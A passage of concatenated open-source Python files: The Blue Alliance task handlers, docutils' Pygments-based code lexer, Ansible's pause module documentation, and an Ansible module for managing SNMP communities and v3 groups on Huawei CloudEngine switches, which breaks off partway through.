if rankings:
district.rankings = rankings
DistrictManipulator.createOrUpdate(district)
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
self.response.out.write("Finished calculating rankings for: {}".format(district_key))
class EventTeamStatusCalcEnqueue(webapp.RequestHandler):
"""
Enqueues calculation of event team status for a year
"""
def get(self, year):
event_keys = [e.id() for e in Event.query(Event.year==int(year)).fetch(keys_only=True)]
for event_key in event_keys:
taskqueue.add(url='/tasks/math/do/event_team_status/{}'.format(event_key), method='GET')
self.response.out.write("Enqueued for: {}".format(event_keys))
class EventTeamStatusCalcDo(webapp.RequestHandler):
"""
Calculates event team statuses for all teams at an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
event_teams = EventTeam.query(EventTeam.event==event.key).fetch()
for event_team in event_teams:
status = EventTeamStatusHelper.generate_team_at_event_status(event_team.team.id(), event)
event_team.status = status
FirebasePusher.update_event_team_status(event_key, event_team.team.id(), status)
EventTeamManipulator.createOrUpdate(event_teams)
if 'X-Appengine-Taskname' not in self.request.headers: # Only write out if not in taskqueue
self.response.out.write("Finished calculating event team statuses for: {}".format(event_key))
class UpcomingNotificationDo(webapp.RequestHandler):
"""
Sends out notifications for upcoming matches
"""
def get(self):
live_events = EventHelper.getEventsWithinADay()
NotificationHelper.send_upcoming_matches(live_events)
class UpdateLiveEventsDo(webapp.RequestHandler):
"""
Updates live events
"""
def get(self):
FirebasePusher.update_live_events()
class MatchTimePredictionsEnqueue(webapp.RequestHandler):
"""
Enqueue match time predictions for all current events
"""
def get(self):
live_events = EventHelper.getEventsWithinADay()
for event in live_events:
taskqueue.add(url='/tasks/math/do/predict_match_times/{}'.format(event.key_name),
method='GET')
# taskqueue.add(url='/tasks/do/bluezone_update', method='GET')
# Clear down events for events that aren't live
status_sitevar = Sitevar.get_by_id('apistatus.down_events')
if status_sitevar is not None:
live_event_keys = set([e.key.id() for e in live_events])
old_status = set(status_sitevar.contents)
new_status = old_status.copy()
for event_key in old_status:
if event_key not in live_event_keys:
new_status.remove(event_key)
status_sitevar.contents = list(new_status)
status_sitevar.put()
# Clear API Response cache
ApiStatusController.clear_cache_if_needed(old_status, new_status)
self.response.out.write("Enqueued time prediction for {} events".format(len(live_events)))
class MatchTimePredictionsDo(webapp.RequestHandler):
"""
Predicts match times for a given live event
Also handles detection for whether the event is down
"""
def get(self, event_key):
import pytz
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
matches = event.matches
if not matches or not event.timezone_id:
return
timezone = pytz.timezone(event.timezone_id)
played_matches = MatchHelper.recentMatches(matches, num=0)
unplayed_matches = MatchHelper.upcomingMatches(matches, num=len(matches))
MatchTimePredictionHelper.predict_future_matches(event_key, played_matches, unplayed_matches, timezone, event.within_a_day)
# Detect whether the event is down
# An event NOT down if ANY unplayed match's predicted time is within its scheduled time by a threshold and
# the last played match (if it exists) wasn't too long ago.
event_down = len(unplayed_matches) > 0
for unplayed_match in unplayed_matches:
if ((unplayed_match.predicted_time and unplayed_match.time and
unplayed_match.predicted_time < unplayed_match.time + datetime.timedelta(minutes=30)) or
(played_matches == [] or played_matches[-1].actual_time is None or played_matches[-1].actual_time > datetime.datetime.now() - datetime.timedelta(minutes=30))):
event_down = False
break
status_sitevar = Sitevar.get_by_id('apistatus.down_events')
if status_sitevar is None:
status_sitevar = Sitevar(id="apistatus.down_events", description="A list of down event keys", values_json="[]")
old_status = set(status_sitevar.contents)
new_status = old_status.copy()
if event_down:
new_status.add(event_key)
elif event_key in new_status:
new_status.remove(event_key)
status_sitevar.contents = list(new_status)
status_sitevar.put()
# Clear API Response cache
ApiStatusController.clear_cache_if_needed(old_status, new_status)
class RebuildPlayoffAdvancementEnqueue(webapp.RequestHandler):
"""
Enqueue rebuilding playoff advancement details for an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
return
taskqueue.add(url='/tasks/math/do/playoff_advancement_update/{}'.format(event.key_name),
method='GET')
self.response.out.write("Enqueued time prediction for {}".format(event.key_name))
class RebuildPlayoffAdvancementDo(webapp.RequestHandler):
"""
Rebuilds playoff advancement for a given event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
event_future = EventQuery(event_key).fetch_async(return_updated=True)
matches_future = EventMatchesQuery(event_key).fetch_async(return_updated=True)
event, _ = event_future.get_result()
matches, _ = matches_future.get_result()
cleaned_matches = MatchHelper.deleteInvalidMatches(matches, event)
matches = MatchHelper.organizeMatches(cleaned_matches)
bracket_table, playoff_advancement, _, _ = PlayoffAdvancementHelper.generatePlayoffAdvancement(event, matches)
event_details = EventDetails(
id=event.key_name,
playoff_advancement={
'advancement': playoff_advancement,
'bracket': bracket_table,
},
)
EventDetailsManipulator.createOrUpdate(event_details)
self.response.out.write("New playoff advancement for {}\n{}".format(event.key_name, json.dumps(event_details.playoff_advancement, indent=2, sort_keys=True)))
class BlueZoneUpdateDo(webapp.RequestHandler):
"""
Update the current "best match"
"""
def get(self):
live_events = EventHelper.getEventsWithinADay()
try:
BlueZoneHelper.update_bluezone(live_events)
except Exception, e:
logging.error("BlueZone update failed")
logging.exception(e)
class SuggestionQueueDailyNag(webapp.RequestHandler):
"""
Daily job to nag a slack channel about pending suggestions
"""
def get(self):
hook_sitevars = Sitevar.get_by_id('slack.hookurls')
if not hook_sitevars:
return
channel_url = hook_sitevars.contents.get('suggestion-nag')
if not channel_url:
return
counts = map(lambda t: SuggestionFetcher.count(Suggestion.REVIEW_PENDING, t),
Suggestion.MODELS)
nag_text = "There are pending suggestions!\n"
suggestions_to_nag = False
for count, name in zip(counts, Suggestion.MODELS):
if count > 0:
suggestions_to_nag = True
nag_text += "*{0}*: {1} pending suggestions\n".format(
Suggestion.MODEL_NAMES.get(name),
count
)
if suggestions_to_nag:
nag_text += "_Review them on <https://www.thebluealliance.com/suggest/review|TBA>_"
OutgoingNotificationHelper.send_slack_alert(channel_url, nag_text)
class RemapTeamsDo(webapp.RequestHandler):
"""
Remaps teams within an Event. Useful for offseason events.
eg: 9254 -> 254B
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
if not event.remap_teams:
return
event.prepAwardsMatchesTeams()
# Remap matches
EventHelper.remapteams_matches(event.matches, event.remap_teams)
MatchManipulator.createOrUpdate(event.matches)
# Remap alliance selections
if event.alliance_selections:
EventHelper.remapteams_alliances(event.alliance_selections, event.remap_teams)
# Remap rankings
if event.rankings:
EventHelper.remapteams_rankings(event.rankings, event.remap_teams)
if event.details and event.details.rankings2:
EventHelper.remapteams_rankings2(event.details.rankings2, event.remap_teams)
EventDetailsManipulator.createOrUpdate(event.details)
# Remap awards
EventHelper.remapteams_awards(event.awards, event.remap_teams)
AwardManipulator.createOrUpdate(event.awards, auto_union=False)
| mit |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/docutils/utils/code_analyzer.py | 9 | 4929 | #!/usr/bin/python
# coding: utf-8
"""Lexical analysis of formal languages (i.e. code) using Pygments."""
# :Author: Georg Brandl; Felix Wiemann; Günter Milde
# :Date: $Date: 2015-04-20 16:05:27 +0200 (Mo, 20. Apr 2015) $
# :Copyright: This module has been placed in the public domain.
from docutils import ApplicationError
try:
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters.html import _get_ttype_class
with_pygments = True
except (ImportError, SyntaxError): # pygments 2.0.1 fails with Py 3.1 and 3.2
with_pygments = False
# Filter the following token types from the list of class arguments:
unstyled_tokens = ['token', # Token (base token type)
'text', # Token.Text
''] # short name for Token and Text
# (Add, e.g., Token.Punctuation with ``unstyled_tokens += 'punctuation'``.)
class LexerError(ApplicationError):
pass
class Lexer(object):
"""Parse `code` lines and yield "classified" tokens.
Arguments
code -- string of source code to parse,
language -- formal language the code is written in,
tokennames -- either 'long', 'short', or '' (see below).
Merge subsequent tokens of the same token-type.
Iterating over an instance yields the tokens as ``(tokentype, value)``
tuples. The value of `tokennames` configures the naming of the tokentype:
'long': downcased full token type name,
'short': short name defined by pygments.token.STANDARD_TYPES
(= class argument used in pygments html output),
'none': skip lexical analysis.
"""
def __init__(self, code, language, tokennames='short'):
"""
Set up a lexical analyzer for `code` in `language`.
"""
self.code = code
self.language = language
self.tokennames = tokennames
self.lexer = None
# get lexical analyzer for `language`:
if language in ('', 'text') or tokennames == 'none':
return
if not with_pygments:
raise LexerError('Cannot analyze code. '
'Pygments package not found.')
try:
self.lexer = get_lexer_by_name(self.language)
except pygments.util.ClassNotFound:
raise LexerError('Cannot analyze code. '
'No Pygments lexer found for "%s".' % language)
# Since version 1.2. (released Jan 01, 2010) Pygments has a
# TokenMergeFilter. However, this requires Python >= 2.4. When Docutils
# requires same minimal version, ``self.merge(tokens)`` in __iter__ can
# be replaced by ``self.lexer.add_filter('tokenmerge')`` in __init__.
def merge(self, tokens):
"""Merge subsequent tokens of same token-type.
Also strip the final newline (added by pygments).
"""
tokens = iter(tokens)
(lasttype, lastval) = tokens.next()
for ttype, value in tokens:
if ttype is lasttype:
lastval += value
else:
yield(lasttype, lastval)
(lasttype, lastval) = (ttype, value)
if lastval.endswith('\n'):
lastval = lastval[:-1]
if lastval:
yield(lasttype, lastval)
def __iter__(self):
"""Parse self.code and yield "classified" tokens.
"""
if self.lexer is None:
yield ([], self.code)
return
tokens = pygments.lex(self.code, self.lexer)
for tokentype, value in self.merge(tokens):
if self.tokennames == 'long': # long CSS class args
classes = str(tokentype).lower().split('.')
else: # short CSS class args
classes = [_get_ttype_class(tokentype)]
classes = [cls for cls in classes if cls not in unstyled_tokens]
yield (classes, value)
class NumberLines(object):
"""Insert linenumber-tokens at the start of every code line.
Arguments
tokens -- iterable of ``(classes, value)`` tuples
startline -- first line number
endline -- last line number
Iterating over an instance yields the tokens with a
``(['ln'], '<the line number>')`` token added for every code line.
Multi-line tokens are splitted."""
def __init__(self, tokens, startline, endline):
self.tokens = tokens
self.startline = startline
# pad linenumbers, e.g. endline == 100 -> fmt_str = '%3d '
self.fmt_str = '%%%dd ' % len(str(endline))
def __iter__(self):
lineno = self.startline
yield (['ln'], self.fmt_str % lineno)
for ttype, value in self.tokens:
lines = value.split('\n')
for line in lines[:-1]:
yield (ttype, line + '\n')
lineno += 1
yield (['ln'], self.fmt_str % lineno)
yield (ttype, lines[-1])
| mit |
rupran/ansible | lib/ansible/modules/utilities/logic/pause.py | 6 | 3075 | # -*- mode: python -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: pause
short_description: Pause playbook execution
description:
- Pauses playbook execution for a set amount of time, or until a prompt is acknowledged. All parameters are optional. The default behavior is to pause with a prompt.
- "You can use C(ctrl+c) if you wish to advance a pause earlier than it is set to expire or if you need to abort a playbook run entirely. To continue early: press C(ctrl+c) and then C(c). To abort a playbook: press C(ctrl+c) and then C(a)."
- "The pause module integrates into async/parallelized playbooks without any special considerations (see also: Rolling Updates). When using pauses with the C(serial) playbook parameter (as in rolling updates) you are only prompted once for the current group of hosts."
version_added: "0.8"
options:
minutes:
description:
- A positive number of minutes to pause for.
required: false
default: null
seconds:
description:
- A positive number of seconds to pause for.
required: false
default: null
prompt:
description:
- Optional text to use for the prompt message.
required: false
default: null
author: "Tim Bielawa (@tbielawa)"
notes:
- Starting in 2.2, if you specify 0 or negative for minutes or seconds, it will wait for 1 second, previously it would wait indefinitely.
'''
EXAMPLES = '''
# Pause for 5 minutes to build app cache.
- pause:
minutes: 5
# Pause until you can verify updates to an application were successful.
- pause:
# A helpful reminder of what to look out for post-update.
- pause:
prompt: "Make sure org.foo.FooOverload exception is not present"
'''
RETURN = '''
user_input:
description: User input from interactive console
returned: if no waiting time set
type: string
sample: Example user input
start:
description: Time when started pausing
returned: always
type: string
sample: 2017-02-23 14:35:07.298862
stop:
description: Time when ended pausing
returned: always
type: string
sample: 2017-02-23 14:35:09.552594
delta:
description: Time paused in seconds
returned: always
type: string
sample: 2
stdout:
description: Output of pause module
returned: always
type: string
sample: Paused for 0.04 minutes
'''
| gpl-3.0 |
tareqalayan/ansible | lib/ansible/modules/network/cloudengine/ce_snmp_community.py | 43 | 32872 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ce_snmp_community
version_added: "2.4"
short_description: Manages SNMP community configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP community configuration on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
acl_number:
description:
- Access control list number.
community_name:
description:
- Unique name to identify the community.
access_right:
description:
- Access right read or write.
choices: ['read','write']
community_mib_view:
description:
- Mib view name.
group_name:
description:
- Unique name to identify the SNMPv3 group.
security_level:
description:
- Security level indicating whether to use authentication and encryption.
choices: ['noAuthNoPriv', 'authentication', 'privacy']
read_view:
description:
- Mib view name for read.
write_view:
description:
- Mib view name for write.
notify_view:
description:
- Mib view name for notification.
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp community test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP community"
ce_snmp_community:
state: present
community_name: Wdz123456789
access_right: write
provider: "{{ cli }}"
- name: "Undo SNMP community"
ce_snmp_community:
state: absent
community_name: Wdz123456789
access_right: write
provider: "{{ cli }}"
- name: "Config SNMP group"
ce_snmp_community:
state: present
group_name: wdz_group
security_level: noAuthNoPriv
acl_number: 2000
provider: "{{ cli }}"
- name: "Undo SNMP group"
ce_snmp_community:
state: absent
group_name: wdz_group
security_level: noAuthNoPriv
acl_number: 2000
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"acl_number": "2000", "group_name": "wdz_group",
"security_level": "noAuthNoPriv", "state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"snmp v3 group": {"snmp_group": ["wdz_group", "noAuthNoPriv", "2000"]}}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent group v3 wdz_group noauthentication acl 2000"]
'''
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import get_nc_config, set_nc_config, ce_argument_spec
# get snmp commutiny
CE_GET_SNMP_COMMUNITY_HEADER = """
<filter type="subtree">
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community>
<communityName></communityName>
<accessRight></accessRight>
"""
CE_GET_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</filter>
"""
# merge snmp commutiny
CE_MERGE_SNMP_COMMUNITY_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community operation="merge">
<communityName>%s</communityName>
<accessRight>%s</accessRight>
"""
CE_MERGE_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</config>
"""
# create snmp commutiny
CE_CREATE_SNMP_COMMUNITY_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community operation="create">
<communityName>%s</communityName>
<accessRight>%s</accessRight>
"""
CE_CREATE_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</config>
"""
# delete snmp commutiny
CE_DELETE_SNMP_COMMUNITY_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community operation="delete">
<communityName>%s</communityName>
<accessRight>%s</accessRight>
"""
CE_DELETE_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</config>
"""
# get snmp v3 group
CE_GET_SNMP_V3_GROUP_HEADER = """
<filter type="subtree">
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group>
<groupName></groupName>
<securityLevel></securityLevel>
"""
CE_GET_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</filter>
"""
# merge snmp v3 group
CE_MERGE_SNMP_V3_GROUP_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group operation="merge">
<groupName>%s</groupName>
<securityLevel>%s</securityLevel>
"""
CE_MERGE_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</filter>
"""
# create snmp v3 group
CE_CREATE_SNMP_V3_GROUP_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group operation="create">
<groupName>%s</groupName>
<securityLevel>%s</securityLevel>
"""
CE_CREATE_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</filter>
"""
# delete snmp v3 group
CE_DELETE_SNMP_V3_GROUP_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group operation="delete">
<groupName>%s</groupName>
<securityLevel>%s</securityLevel>
"""
CE_DELETE_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</filter>
"""
class SnmpCommunity(object):
""" Manages SNMP community configuration """
def netconf_get_config(self, **kwargs):
""" Get configure through netconf """
module = kwargs["module"]
conf_str = kwargs["conf_str"]
xml_str = get_nc_config(module, conf_str)
return xml_str
def netconf_set_config(self, **kwargs):
""" Set configure through netconf """
module = kwargs["module"]
conf_str = kwargs["conf_str"]
xml_str = set_nc_config(module, conf_str)
return xml_str
def check_snmp_community_args(self, **kwargs):
""" Check snmp community args """
module = kwargs["module"]
result = dict()
need_cfg = False
result["community_info"] = []
state = module.params['state']
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
if community_name and access_right:
if len(community_name) > 32 or len(community_name) == 0:
module.fail_json(
msg='Error: The len of community_name %s is out of [1 - 32].' % community_name)
if acl_number:
if acl_number.isdigit():
if int(acl_number) > 2999 or int(acl_number) < 2000:
module.fail_json(
msg='Error: The value of acl_number %s is out of [2000 - 2999].' % acl_number)
else:
if not acl_number[0].isalpha() or len(acl_number) > 32 or len(acl_number) < 1:
module.fail_json(
msg='Error: The len of acl_number %s is out of [1 - 32] or is invalid.' % acl_number)
if community_mib_view:
if len(community_mib_view) > 32 or len(community_mib_view) == 0:
module.fail_json(
msg='Error: The len of community_mib_view %s is out of [1 - 32].' % community_mib_view)
conf_str = CE_GET_SNMP_COMMUNITY_HEADER
if acl_number:
conf_str += "<aclNumber></aclNumber>"
if community_mib_view:
conf_str += "<mibViewName></mibViewName>"
conf_str += CE_GET_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_get_config(module=module, conf_str=conf_str)
if "<data/>" in recv_xml:
if state == "present":
need_cfg = True
else:
xml_str = recv_xml.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
community_info = root.findall("data/snmp/communitys/community")
if community_info:
for tmp in community_info:
tmp_dict = dict()
for site in tmp:
if site.tag in ["communityName", "accessRight", "aclNumber", "mibViewName"]:
tmp_dict[site.tag] = site.text
result["community_info"].append(tmp_dict)
if result["community_info"]:
for tmp in result["community_info"]:
if "communityName" in tmp.keys():
need_cfg = True
if "accessRight" in tmp.keys():
if state == "present":
if tmp["accessRight"] != access_right:
need_cfg = True
else:
if tmp["accessRight"] == access_right:
need_cfg = True
if acl_number:
if "aclNumber" in tmp.keys():
if state == "present":
if tmp["aclNumber"] != acl_number:
need_cfg = True
else:
if tmp["aclNumber"] == acl_number:
need_cfg = True
if community_mib_view:
if "mibViewName" in tmp.keys():
if state == "present":
if tmp["mibViewName"] != community_mib_view:
need_cfg = True
else:
if tmp["mibViewName"] == community_mib_view:
need_cfg = True
result["need_cfg"] = need_cfg
return result
def check_snmp_v3_group_args(self, **kwargs):
""" Check snmp v3 group args """
module = kwargs["module"]
result = dict()
need_cfg = False
result["group_info"] = []
state = module.params['state']
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
community_name = module.params['community_name']
access_right = module.params['access_right']
if group_name and security_level:
if community_name and access_right:
module.fail_json(
msg='Error: Community is used for v1/v2c, group_name is used for v3, do not '
'input at the same time.')
if len(group_name) > 32 or len(group_name) == 0:
module.fail_json(
msg='Error: The len of group_name %s is out of [1 - 32].' % group_name)
if acl_number:
if acl_number.isdigit():
if int(acl_number) > 2999 or int(acl_number) < 2000:
module.fail_json(
msg='Error: The value of acl_number %s is out of [2000 - 2999].' % acl_number)
else:
if not acl_number[0].isalpha() or len(acl_number) > 32 or len(acl_number) < 1:
module.fail_json(
msg='Error: The len of acl_number %s is out of [1 - 32] or is invalid.' % acl_number)
if read_view:
if len(read_view) > 32 or len(read_view) < 1:
module.fail_json(
msg='Error: The len of read_view %s is out of [1 - 32].' % read_view)
if write_view:
if len(write_view) > 32 or len(write_view) < 1:
module.fail_json(
msg='Error: The len of write_view %s is out of [1 - 32].' % write_view)
if notify_view:
if len(notify_view) > 32 or len(notify_view) < 1:
module.fail_json(
msg='Error: The len of notify_view %s is out of [1 - 32].' % notify_view)
conf_str = CE_GET_SNMP_V3_GROUP_HEADER
if acl_number:
conf_str += "<aclNumber></aclNumber>"
if read_view:
conf_str += "<readViewName></readViewName>"
if write_view:
conf_str += "<writeViewName></writeViewName>"
if notify_view:
conf_str += "<notifyViewName></notifyViewName>"
conf_str += CE_GET_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_get_config(module=module, conf_str=conf_str)
if "<data/>" in recv_xml:
if state == "present":
need_cfg = True
else:
xml_str = recv_xml.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
group_info = root.findall("data/snmp/snmpv3Groups/snmpv3Group")
if group_info:
for tmp in group_info:
tmp_dict = dict()
for site in tmp:
if site.tag in ["groupName", "securityLevel", "readViewName", "writeViewName",
"notifyViewName", "aclNumber"]:
tmp_dict[site.tag] = site.text
result["group_info"].append(tmp_dict)
if result["group_info"]:
for tmp in result["group_info"]:
if "groupName" in tmp.keys():
if state == "present":
if tmp["groupName"] != group_name:
need_cfg = True
else:
if tmp["groupName"] == group_name:
need_cfg = True
if "securityLevel" in tmp.keys():
if state == "present":
if tmp["securityLevel"] != security_level:
need_cfg = True
else:
if tmp["securityLevel"] == security_level:
need_cfg = True
if acl_number:
if "aclNumber" in tmp.keys():
if state == "present":
if tmp["aclNumber"] != acl_number:
need_cfg = True
else:
if tmp["aclNumber"] == acl_number:
need_cfg = True
if read_view:
if "readViewName" in tmp.keys():
if state == "present":
if tmp["readViewName"] != read_view:
need_cfg = True
else:
if tmp["readViewName"] == read_view:
need_cfg = True
if write_view:
if "writeViewName" in tmp.keys():
if state == "present":
if tmp["writeViewName"] != write_view:
need_cfg = True
else:
if tmp["writeViewName"] == write_view:
need_cfg = True
if notify_view:
if "notifyViewName" in tmp.keys():
if state == "present":
if tmp["notifyViewName"] != notify_view:
need_cfg = True
else:
if tmp["notifyViewName"] == notify_view:
need_cfg = True
result["need_cfg"] = need_cfg
return result
def merge_snmp_community(self, **kwargs):
""" Merge snmp community operation """
module = kwargs["module"]
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
conf_str = CE_MERGE_SNMP_COMMUNITY_HEADER % (
community_name, access_right)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if community_mib_view:
conf_str += "<mibViewName>%s</mibViewName>" % community_mib_view
conf_str += CE_MERGE_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Merge snmp community failed.')
community_safe_name = "******"
cmd = "snmp-agent community %s %s" % (access_right, community_safe_name)
if acl_number:
cmd += " acl %s" % acl_number
if community_mib_view:
cmd += " mib-view %s" % community_mib_view
return cmd
def create_snmp_community(self, **kwargs):
""" Create snmp community operation """
module = kwargs["module"]
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
conf_str = CE_CREATE_SNMP_COMMUNITY_HEADER % (
community_name, access_right)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if community_mib_view:
conf_str += "<mibViewName>%s</mibViewName>" % community_mib_view
conf_str += CE_CREATE_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Create snmp community failed.')
community_safe_name = "******"
cmd = "snmp-agent community %s %s" % (access_right, community_safe_name)
if acl_number:
cmd += " acl %s" % acl_number
if community_mib_view:
cmd += " mib-view %s" % community_mib_view
return cmd
def delete_snmp_community(self, **kwargs):
""" Delete snmp community operation """
module = kwargs["module"]
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
conf_str = CE_DELETE_SNMP_COMMUNITY_HEADER % (
community_name, access_right)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if community_mib_view:
conf_str += "<mibViewName>%s</mibViewName>" % community_mib_view
conf_str += CE_DELETE_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Create snmp community failed.')
community_safe_name = "******"
cmd = "undo snmp-agent community %s %s" % (
access_right, community_safe_name)
return cmd
def merge_snmp_v3_group(self, **kwargs):
""" Merge snmp v3 group operation """
module = kwargs["module"]
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
conf_str = CE_MERGE_SNMP_V3_GROUP_HEADER % (group_name, security_level)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if read_view:
conf_str += "<readViewName>%s</readViewName>" % read_view
if write_view:
conf_str += "<writeViewName>%s</writeViewName>" % write_view
if notify_view:
conf_str += "<notifyViewName>%s</notifyViewName>" % notify_view
conf_str += CE_MERGE_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Merge snmp v3 group failed.')
if security_level == "noAuthNoPriv":
security_level_cli = "noauthentication"
elif security_level == "authentication":
security_level_cli = "authentication"
elif security_level == "privacy":
security_level_cli = "privacy"
cmd = "snmp-agent group v3 %s %s" % (group_name, security_level_cli)
if read_view:
cmd += " read-view %s" % read_view
if write_view:
cmd += " write-view %s" % write_view
if notify_view:
cmd += " notify-view %s" % notify_view
if acl_number:
cmd += " acl %s" % acl_number
return cmd
def create_snmp_v3_group(self, **kwargs):
""" Create snmp v3 group operation """
module = kwargs["module"]
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
conf_str = CE_CREATE_SNMP_V3_GROUP_HEADER % (
group_name, security_level)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if read_view:
conf_str += "<readViewName>%s</readViewName>" % read_view
if write_view:
conf_str += "<writeViewName>%s</writeViewName>" % write_view
if notify_view:
conf_str += "<notifyViewName>%s</notifyViewName>" % notify_view
conf_str += CE_CREATE_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Create snmp v3 group failed.')
if security_level == "noAuthNoPriv":
security_level_cli = "noauthentication"
elif security_level == "authentication":
security_level_cli = "authentication"
elif security_level == "privacy":
security_level_cli = "privacy"
cmd = "snmp-agent group v3 %s %s" % (group_name, security_level_cli)
if read_view:
cmd += " read-view %s" % read_view
if write_view:
cmd += " write-view %s" % write_view
if notify_view:
cmd += " notify-view %s" % notify_view
if acl_number:
